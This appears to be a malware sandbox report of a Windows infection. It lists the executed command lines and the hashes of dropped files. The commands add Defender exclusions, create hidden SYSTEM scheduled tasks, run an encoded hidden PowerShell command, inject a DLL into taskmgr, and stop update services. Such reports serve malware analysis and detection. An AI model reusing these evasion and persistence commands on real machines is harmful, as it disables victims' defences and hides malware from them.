C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DlbZONUGhjVU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DlbZONUGhjVU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GpfcWYRxKqUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GpfcWYRxKqUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KrPQunXfXpAVC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KrPQunXfXpAVC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oVhJPNkDU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oVhJPNkDU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nBRnpywzcTvqknVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nBRnpywzcTvqknVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nBRnpywzcTvqknVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nBRnpywzcTvqknVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wUBDPVxDQVpvNZiy /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wUBDPVxDQVpvNZiy /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gbzFHAGqR" /SC once /ST 03:22:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gbzFHAGqR"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc

\??\c:\windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gbzFHAGqR"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "GyWbuVQzPmDmgkCMH" /SC once /ST 00:20:24 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe\" KS /tcsite_idDGS 385119 /S" /V1 /F

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "GyWbuVQzPmDmgkCMH"

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe

C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe KS /tcsite_idDGS 385119 /S

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bwpFiyeZPJPVdaMxTt"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oVhJPNkDU\bWlzgM.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ztlTbPYifermRZH" /V1 /F

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ztlTbPYifermRZH2" /F /xml "C:\Program Files (x86)\oVhJPNkDU\ucUuRll.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "ztlTbPYifermRZH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ztlTbPYifermRZH"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "lYRFoiYPtWPCfC" /F /xml "C:\Program Files (x86)\DlbZONUGhjVU2\kvnvOro.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "TrprvximDXTQo2" /F /xml "C:\ProgramData\nBRnpywzcTvqknVB\obLKYhY.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "NtSpqNxSmBAhIMqiB2" /F /xml "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\PSUhcLe.xml" /RU "SYSTEM"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gFXJCgZLnIrdqQxYYQs2" /F /xml "C:\Program Files (x86)\KrPQunXfXpAVC\oLySDfI.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "HKFMMLmWpeGdwIqGl" /SC once /ST 00:22:10 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\eOnZcghK\dUUvmRC.dll\",#1 /Aqsite_idnbu 385119" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "HKFMMLmWpeGdwIqGl"

\??\c:\windows\system32\rundll32.EXE

c:\windows\system32\rundll32.EXE "C:\Windows\Temp\wUBDPVxDQVpvNZiy\eOnZcghK\dUUvmRC.dll",#1 /Aqsite_idnbu 385119

C:\Windows\SysWOW64\rundll32.exe

c:\windows\system32\rundll32.EXE "C:\Windows\Temp\wUBDPVxDQVpvNZiy\eOnZcghK\dUUvmRC.dll",#1 /Aqsite_idnbu 385119

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "HKFMMLmWpeGdwIqGl"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "GyWbuVQzPmDmgkCMH"

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn "csrss" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn "ScheduledUpdate" /f

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

Network


Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe

MD5 ebbfdd3142cd932c64243266942df005
SHA1 db53a3b003df5acddf557eaf1f234d4b9a30925d
SHA256 ab352a642081b63b9dc26490ee837dbd75d05e84a82fe64c1e6d98824c6c3c04
SHA512 f12f85ca407c8c95e93ea82fd89eb4538da056bbfc814ce5e5ea660e159f57bdb4fd7fdc81d4b92e93176063617de8c31c5f0f99cb4145c989f1f35c74eef649

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe

MD5 b0eeae69b80888ff98dc8649c767b7d2
SHA1 ae98630ac50e7aaaa5d0fa7da72b52817ef39001
SHA256 d86f8ffa3cfb45b0ae5e143d2fd07e73e499e81fdf3761879030010e695abd6e
SHA512 79f83eb8877b939788d2694895fcac08886cb28bfa70e639a5312f15793fee4dd2e1f40b8f68a6abbdea46b49806b25dc1abf4aab0ef4f77bf23fe82abe62ae0

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe

MD5 243758911f0cc3ab8e68cab2f08352e1
SHA1 e565aa389fc39944e5480422aff8add698eac921
SHA256 7b4ac23836c12a2561af7be8a35bb1a0c710d2c625f4c84cf860a2a362b2333d
SHA512 4a0f4fb9758a3de8730ff8901bd6c131d7892499dd49875e109a0bf3e489fa085eb0c10e7701692efb945339bf33c1356679cb821b8995ad625dc08fb809dd5d

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe

MD5 243758911f0cc3ab8e68cab2f08352e1
SHA1 e565aa389fc39944e5480422aff8add698eac921
SHA256 7b4ac23836c12a2561af7be8a35bb1a0c710d2c625f4c84cf860a2a362b2333d
SHA512 4a0f4fb9758a3de8730ff8901bd6c131d7892499dd49875e109a0bf3e489fa085eb0c10e7701692efb945339bf33c1356679cb821b8995ad625dc08fb809dd5d

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe

MD5 00081a3830d97a88bd9640af4752d0fb
SHA1 2d9a67b149f1751c25695f69e51e213fb3dfe5bc
SHA256 cfcd5f938cffdaa06209d233883b4003a926884976ce0b8379ef87ce55694b28
SHA512 be91caf4dc8ca06a4cf6a2cc2b1cd46ce67dd1f50f64e21d7204c2a99246b0d3fce5a9689f459333ee8b13f22e41c61fadf3f6f268f23c1fc8711fb741bfdbd4

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe

MD5 00081a3830d97a88bd9640af4752d0fb
SHA1 2d9a67b149f1751c25695f69e51e213fb3dfe5bc
SHA256 cfcd5f938cffdaa06209d233883b4003a926884976ce0b8379ef87ce55694b28
SHA512 be91caf4dc8ca06a4cf6a2cc2b1cd46ce67dd1f50f64e21d7204c2a99246b0d3fce5a9689f459333ee8b13f22e41c61fadf3f6f268f23c1fc8711fb741bfdbd4

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe

MD5 29e9546e7fe835b413a5d65599213b53
SHA1 64d6d2eca4e197a390702a08b074c5ef6da2fa32
SHA256 d65b10dc2c1598935786fd0d562aaee9c9fc6b7d6f950da6de13db6686cab814
SHA512 e556877abd79052f3d3bc6175971001531f363745d396aa96302218cf11b4fc94980f946aae758ff14d8cc8af4d9dcb26503142e2d1cded2d21ab37ddc009658

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe

MD5 29e9546e7fe835b413a5d65599213b53
SHA1 64d6d2eca4e197a390702a08b074c5ef6da2fa32
SHA256 d65b10dc2c1598935786fd0d562aaee9c9fc6b7d6f950da6de13db6686cab814
SHA512 e556877abd79052f3d3bc6175971001531f363745d396aa96302218cf11b4fc94980f946aae758ff14d8cc8af4d9dcb26503142e2d1cded2d21ab37ddc009658

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe

C:\Users\Admin\AppData\Local\Temp\ED00.tmp\ED10.tmp\ED11.bat

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\4QZ3T2N5.cookie

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_802691FEFBCBFDBC6638E7243774E081

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_802691FEFBCBFDBC6638E7243774E081

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\F37L0VW4.cookie

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_249A1AAD948A044308274CC39E5A79B2

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_249A1AAD948A044308274CC39E5A79B2

